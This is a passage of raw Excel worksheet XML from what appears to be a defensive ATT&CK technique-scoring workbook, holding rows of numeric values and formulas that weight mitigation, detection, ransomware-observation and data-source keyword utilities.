        <v>0</v>
      </c>
      <c r="N127" s="56">
        <v>0</v>
      </c>
      <c r="O127" s="56">
        <v>0</v>
      </c>
      <c r="P127" s="56">
        <v>0</v>
      </c>
      <c r="Q127" s="56">
        <v>0</v>
      </c>
      <c r="R127" s="57"/>
      <c r="S127" s="57">
        <v>0</v>
      </c>
      <c r="T127" s="57"/>
      <c r="U127" s="57">
        <v>0</v>
      </c>
      <c r="V127" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W127" s="37">
        <v>0</v>
      </c>
      <c r="X127" s="37">
        <v>0</v>
      </c>
      <c r="Y127" s="37">
        <v>0</v>
      </c>
      <c r="Z127" s="37">
        <v>0</v>
      </c>
      <c r="AA127" s="37">
        <v>0</v>
      </c>
      <c r="AB127" s="37">
        <v>0</v>
      </c>
      <c r="AC127" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD127" s="50" t="s">
        <v>469</v>
      </c>
      <c r="AE127" s="37" t="str" cm="1">
        <f t="array" ref="AE127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD127)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF127" s="37">
        <v>123</v>
      </c>
      <c r="AG127" s="37" t="str" cm="1">
        <f t="array" ref="AG127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD127)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH127" s="37">
        <v>123</v>
      </c>
      <c r="AI127" s="37" t="str" cm="1">
        <f t="array" ref="AI127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD127)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ127" s="37">
        <v>123</v>
      </c>
      <c r="AK127" s="37" t="str" cm="1">
        <f t="array" ref="AK127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD127)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL127" s="37">
        <v>123</v>
      </c>
      <c r="AM127" s="37" t="str" cm="1">
        <f t="array" ref="AM127">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD127)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN127" s="37">
        <v>0</v>
      </c>
      <c r="AO127" s="37"/>
      <c r="AP127" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ127" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>16.433333333333334</v>
      </c>
      <c r="AR127" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS127" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT127" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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28" spans="1:47" ht="34">
      <c r="A128" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B128" s="37">
        <f t="shared" si="1"/>
        <v>49.7</v>
      </c>
      <c r="C128" s="37" t="s">
        <v>470</v>
      </c>
      <c r="D128" s="50" t="s">
        <v>471</v>
      </c>
      <c r="E128" s="37"/>
      <c r="F128" s="37">
        <v>1</v>
      </c>
      <c r="G128" s="37">
        <v>1</v>
      </c>
      <c r="H128" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I128" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J128" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K128" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L128" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M128" s="37">
        <v>0</v>
      </c>
      <c r="N128" s="56">
        <v>0</v>
      </c>
      <c r="O128" s="56">
        <v>0</v>
      </c>
      <c r="P128" s="56">
        <v>0</v>
      </c>
      <c r="Q128" s="56">
        <v>0</v>
      </c>
      <c r="R128" s="57"/>
      <c r="S128" s="57">
        <v>0</v>
      </c>
      <c r="T128" s="57"/>
      <c r="U128" s="57">
        <v>0</v>
      </c>
      <c r="V128" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W128" s="37">
        <v>0</v>
      </c>
      <c r="X128" s="37">
        <v>0</v>
      </c>
      <c r="Y128" s="37">
        <v>0</v>
      </c>
      <c r="Z128" s="37">
        <v>0</v>
      </c>
      <c r="AA128" s="37">
        <v>0</v>
      </c>
      <c r="AB128" s="37">
        <v>0</v>
      </c>
      <c r="AC128" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD128" s="50" t="s">
        <v>472</v>
      </c>
      <c r="AE128" s="37" t="str" cm="1">
        <f t="array" ref="AE128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD128)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF128" s="37">
        <v>124</v>
      </c>
      <c r="AG128" s="37" t="str" cm="1">
        <f t="array" ref="AG128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD128)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH128" s="37">
        <v>124</v>
      </c>
      <c r="AI128" s="37" t="str" cm="1">
        <f t="array" ref="AI128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD128)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ128" s="37">
        <v>124</v>
      </c>
      <c r="AK128" s="37" t="str" cm="1">
        <f t="array" ref="AK128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD128)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL128" s="37">
        <v>124</v>
      </c>
      <c r="AM128" s="37" t="str" cm="1">
        <f t="array" ref="AM128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD128)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN128" s="37">
        <v>0</v>
      </c>
      <c r="AO128" s="37"/>
      <c r="AP128" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ128" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>16.566666666666666</v>
      </c>
      <c r="AR128" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS128" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT128" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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29" spans="1:47" ht="34">
      <c r="A129" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B129" s="37">
        <f t="shared" si="1"/>
        <v>462.74793428571428</v>
      </c>
      <c r="C129" s="37" t="s">
        <v>473</v>
      </c>
      <c r="D129" s="50" t="s">
        <v>474</v>
      </c>
      <c r="E129" s="37"/>
      <c r="F129" s="37">
        <v>5</v>
      </c>
      <c r="G129" s="37">
        <v>2</v>
      </c>
      <c r="H129" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I129" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.5</v>
      </c>
      <c r="J129" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="K129" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L129" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M129" s="37">
        <v>2.2200000000000002E-3</v>
      </c>
      <c r="N129" s="56">
        <v>1</v>
      </c>
      <c r="O129" s="56">
        <v>25</v>
      </c>
      <c r="P129" s="56">
        <v>18</v>
      </c>
      <c r="Q129" s="56">
        <v>10</v>
      </c>
      <c r="R129" s="57" t="s">
        <v>475</v>
      </c>
      <c r="S129" s="57">
        <v>8</v>
      </c>
      <c r="T129" s="57" t="s">
        <v>476</v>
      </c>
      <c r="U129" s="57">
        <v>25</v>
      </c>
      <c r="V129" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.5714285714285714</v>
      </c>
      <c r="W129" s="37">
        <v>33</v>
      </c>
      <c r="X129" s="37">
        <v>0.6</v>
      </c>
      <c r="Y129" s="37">
        <v>0.6</v>
      </c>
      <c r="Z129" s="37">
        <v>54</v>
      </c>
      <c r="AA129" s="37">
        <v>0.54</v>
      </c>
      <c r="AB129" s="37">
        <v>0.54</v>
      </c>
      <c r="AC129" s="37"/>
      <c r="AD129" s="50" t="s">
        <v>477</v>
      </c>
      <c r="AE129" s="37" t="str" cm="1">
        <f t="array" ref="AE129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD129)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF129" s="37">
        <v>125</v>
      </c>
      <c r="AG129" s="37" t="str" cm="1">
        <f t="array" ref="AG129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD129)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH129" s="37">
        <v>125</v>
      </c>
      <c r="AI129" s="37" t="str" cm="1">
        <f t="array" ref="AI129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD129)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ129" s="37">
        <v>125</v>
      </c>
      <c r="AK129" s="37" t="str" cm="1">
        <f t="array" ref="AK129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD129)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL129" s="37">
        <v>125</v>
      </c>
      <c r="AM129" s="37" t="str" cm="1">
        <f t="array" ref="AM129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD129)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN129" s="37">
        <v>0</v>
      </c>
      <c r="AO129" s="37">
        <v>2</v>
      </c>
      <c r="AP129" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ129" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>154.24931142857142</v>
      </c>
      <c r="AR129" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS129" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT129" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU12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7.3928243537414957</v>
      </c>
    </row>
    <row r="130" spans="1:47" ht="51">
      <c r="A130" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B130" s="37">
        <f t="shared" si="1"/>
        <v>136.23084404761903</v>
      </c>
      <c r="C130" s="37" t="s">
        <v>478</v>
      </c>
      <c r="D130" s="50" t="s">
        <v>479</v>
      </c>
      <c r="E130" s="37"/>
      <c r="F130" s="37">
        <v>1</v>
      </c>
      <c r="G130" s="37">
        <v>1</v>
      </c>
      <c r="H130" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I130" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J130" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K130" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L130" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M130" s="37">
        <v>2.2145000000000001E-2</v>
      </c>
      <c r="N130" s="56">
        <v>0</v>
      </c>
      <c r="O130" s="56">
        <v>1</v>
      </c>
      <c r="P130" s="56">
        <v>5</v>
      </c>
      <c r="Q130" s="56">
        <v>25</v>
      </c>
      <c r="R130" s="57"/>
      <c r="S130" s="57">
        <v>0</v>
      </c>
      <c r="T130" s="57"/>
      <c r="U130" s="57">
        <v>0</v>
      </c>
      <c r="V130" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14761904761904762</v>
      </c>
      <c r="W130" s="37">
        <v>0</v>
      </c>
      <c r="X130" s="37">
        <v>0</v>
      </c>
      <c r="Y130" s="37">
        <v>0</v>
      </c>
      <c r="Z130" s="37">
        <v>31</v>
      </c>
      <c r="AA130" s="37">
        <v>0.31</v>
      </c>
      <c r="AB130" s="37">
        <v>0.31</v>
      </c>
      <c r="AC130" s="37"/>
      <c r="AD130" s="50" t="s">
        <v>480</v>
      </c>
      <c r="AE130" s="37" t="str" cm="1">
        <f t="array" ref="AE130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD130)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF130" s="37">
        <v>126</v>
      </c>
      <c r="AG130" s="37" t="str" cm="1">
        <f t="array" ref="AG130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD130)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH130" s="37">
        <v>126</v>
      </c>
      <c r="AI130" s="37" t="str" cm="1">
        <f t="array" ref="AI130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD130)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ130" s="37">
        <v>126</v>
      </c>
      <c r="AK130" s="37" t="str" cm="1">
        <f t="array" ref="AK130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD130)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL130" s="37">
        <v>126</v>
      </c>
      <c r="AM130" s="37" t="str" cm="1">
        <f t="array" ref="AM130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD130)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN130" s="37">
        <v>0</v>
      </c>
      <c r="AO130" s="37">
        <v>0</v>
      </c>
      <c r="AP130" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ130" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>45.410281349206343</v>
      </c>
      <c r="AR130" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS130" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT130" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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31" spans="1:47" ht="51">
      <c r="A131" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B131" s="37">
        <f t="shared" si="1"/>
        <v>121.19047619047619</v>
      </c>
      <c r="C131" s="37" t="s">
        <v>481</v>
      </c>
      <c r="D131" s="50" t="s">
        <v>479</v>
      </c>
      <c r="E131" s="37" t="s">
        <v>482</v>
      </c>
      <c r="F131" s="37">
        <v>1</v>
      </c>
      <c r="G131" s="37">
        <v>1</v>
      </c>
      <c r="H131" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I131" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J131" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K131" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L131" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M131" s="37">
        <v>0</v>
      </c>
      <c r="N131" s="56">
        <v>3</v>
      </c>
      <c r="O131" s="56">
        <v>14</v>
      </c>
      <c r="P131" s="56">
        <v>1</v>
      </c>
      <c r="Q131" s="56">
        <v>11</v>
      </c>
      <c r="R131" s="57"/>
      <c r="S131" s="57">
        <v>0</v>
      </c>
      <c r="T131" s="57"/>
      <c r="U131" s="57">
        <v>0</v>
      </c>
      <c r="V131" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13809523809523808</v>
      </c>
      <c r="W131" s="37">
        <v>0</v>
      </c>
      <c r="X131" s="37">
        <v>0</v>
      </c>
      <c r="Y131" s="37">
        <v>0</v>
      </c>
      <c r="Z131" s="37">
        <v>29</v>
      </c>
      <c r="AA131" s="37">
        <v>0.28999999999999998</v>
      </c>
      <c r="AB131" s="37">
        <v>0.28999999999999998</v>
      </c>
      <c r="AC131" s="37"/>
      <c r="AD131" s="50" t="s">
        <v>483</v>
      </c>
      <c r="AE131" s="37" t="str" cm="1">
        <f t="array" ref="AE131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD131)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF131" s="37">
        <v>127</v>
      </c>
      <c r="AG131" s="37" t="str" cm="1">
        <f t="array" ref="AG131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD131)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH131" s="37">
        <v>127</v>
      </c>
      <c r="AI131" s="37" t="str" cm="1">
        <f t="array" ref="AI131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD131)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ131" s="37">
        <v>127</v>
      </c>
      <c r="AK131" s="37" t="str" cm="1">
        <f t="array" ref="AK131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD131)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL131" s="37">
        <v>127</v>
      </c>
      <c r="AM131" s="37" t="str" cm="1">
        <f t="array" ref="AM131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD131)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN131" s="37">
        <v>0</v>
      </c>
      <c r="AO131" s="37">
        <v>0</v>
      </c>
      <c r="AP131" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ131" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.396825396825399</v>
      </c>
      <c r="AR131" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS131" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT131" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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32" spans="1:47" ht="51">
      <c r="A132" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B132" s="37">
        <f t="shared" si="1"/>
        <v>131.91428571428571</v>
      </c>
      <c r="C132" s="37" t="s">
        <v>484</v>
      </c>
      <c r="D132" s="50" t="s">
        <v>479</v>
      </c>
      <c r="E132" s="37" t="s">
        <v>485</v>
      </c>
      <c r="F132" s="37">
        <v>1</v>
      </c>
      <c r="G132" s="37">
        <v>1</v>
      </c>
      <c r="H132" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I132" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J132" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K132" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L132" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M132" s="37">
        <v>0</v>
      </c>
      <c r="N132" s="56">
        <v>3</v>
      </c>
      <c r="O132" s="56">
        <v>10</v>
      </c>
      <c r="P132" s="56">
        <v>2</v>
      </c>
      <c r="Q132" s="56">
        <v>18</v>
      </c>
      <c r="R132" s="57"/>
      <c r="S132" s="57">
        <v>0</v>
      </c>
      <c r="T132" s="57"/>
      <c r="U132" s="57">
        <v>0</v>
      </c>
      <c r="V132" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15714285714285714</v>
      </c>
      <c r="W132" s="37">
        <v>0</v>
      </c>
      <c r="X132" s="37">
        <v>0</v>
      </c>
      <c r="Y132" s="37">
        <v>0</v>
      </c>
      <c r="Z132" s="37">
        <v>33</v>
      </c>
      <c r="AA132" s="37">
        <v>0.33</v>
      </c>
      <c r="AB132" s="37">
        <v>0.33</v>
      </c>
      <c r="AC132" s="37"/>
      <c r="AD132" s="50" t="s">
        <v>483</v>
      </c>
      <c r="AE132" s="37" t="str" cm="1">
        <f t="array" ref="AE132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD132)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF132" s="37">
        <v>128</v>
      </c>
      <c r="AG132" s="37" t="str" cm="1">
        <f t="array" ref="AG132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD132)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH132" s="37">
        <v>128</v>
      </c>
      <c r="AI132" s="37" t="str" cm="1">
